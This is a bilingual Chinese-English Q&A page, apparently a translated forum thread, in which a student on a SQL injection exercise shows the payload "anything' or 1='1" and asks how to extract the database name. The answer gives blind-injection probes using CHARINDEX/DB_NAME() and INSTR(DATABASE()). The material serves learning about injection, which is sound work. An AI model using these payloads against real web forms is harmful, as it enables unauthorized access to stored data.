SQL注入-MYSQL [英] SQL Injection - MYSQL
问题描述
我正在对SQL Injection进行练习,给出了查询.数据介于"之间.所以这是查询:
I'm doing an exercise on the SQL Injection, the query is given. The data comes in between ''. So this is the query:
select * from contacts where name = ''
我设法使用以下方法查看表格中的用户:
I managed to see the users in the table using this:
select * from contacts where name = 'anything' or 1='1'
但是我的问题是如何编写它以便编写新查询?或例如查看数据库名称,以便我可以检查其他表.
But my question is how I can write it so that I can write a new query? Or see the database name for example so that I can check other tables.
为避免混淆,查询没有提供给我们,网页上有一个文本字段,这就是我们用来进行SQL注入的方法.
To avoid confusion the query is not given to us, there is a textfield on a webpage, that's what we use to do SQL injection.
因此,假设查询是这样的:
So imagine the query is being this:
select * from contacts where name = ''
然后我将此代码写到了文本字段中,以查看所有用户.
And I wrote this to the text field, to see all the users.
anything' or 1='1
我试图了解如何使用此文本字段,查看数据库名称或运行其他查询.
I'm trying to understand how I can use this textfield, to see the name of the database, or run other queries.
谢谢.
推荐答案
如果您的数据未返回多结果集,则可以这样:
If your data does not return multi-result sets then you can so something like:
在SQL Server中
In SQL Server
SELECT * FROM Contact WHERE LastName='o_O' OR CHARINDEX('A',DB_NAME())=1
SELECT * FROM Contact WHERE LastName='o_O' OR CHARINDEX('A',DB_NAME())=2
SELECT * FROM Contact WHERE LastName='o_O' OR CHARINDEX('A',DB_NAME())=3
...
直到获得名称中字符的所有正确索引.
Until you get all the correct indexes of the characters in the name.
在MySQL中,它将类似于:
In MySQL it would be something like:
SELECT * FROM Contact WHERE LastName='o_O' OR INSTR(DATABASE(),'A') =1
SELECT * FROM Contact WHERE LastName='o_O' OR INSTR(DATABASE(),'A') =2
SELECT * FROM Contact WHERE LastName='o_O' OR INSTR(DATABASE(),'A') =3
...
这篇关于SQL注入-MYSQL的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!